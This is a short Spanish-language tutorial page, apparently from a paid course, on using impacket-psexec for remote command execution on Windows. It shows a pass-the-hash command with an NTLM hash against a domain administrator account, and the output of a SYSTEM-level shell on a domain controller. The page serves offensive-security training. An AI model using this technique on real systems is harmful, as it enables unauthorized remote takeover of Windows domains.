Utilizando impacket-psexec

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!

Impacket es una colección de clases de Python para trabajar con protocolos de red. psexec.py es una de las herramientas incluidas en el conjunto de herramientas de Impacket que facilita la ejecución remota de comandos en sistemas Windows, de manera similar a la herramienta PsExec de Sysinternals.

kali@kali=> impacket-psexec -hashes :64fbae31cc352fc26af97cbdef151e03 spartancybersec.corp/admin@3.14.245.175
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 3.14.245.175.....
[*] Found writable share ADMIN$
[*] Uploading file yGhPGvdr.exe
[*] Opening SVCManager on 3.14.245.175.....
[*] Creating service loat on 3.14.245.175.....
[*] Starting service loat.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3406]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
First-DC

C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::dc16:bad5:b35:e9e9%4
   IPv4 Address. . . . . . . . . . . : 10.0.1.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

AnteriorUtilizando Evil-WinRm SiguienteUtilizando RDP

Última actualización hace 1 mes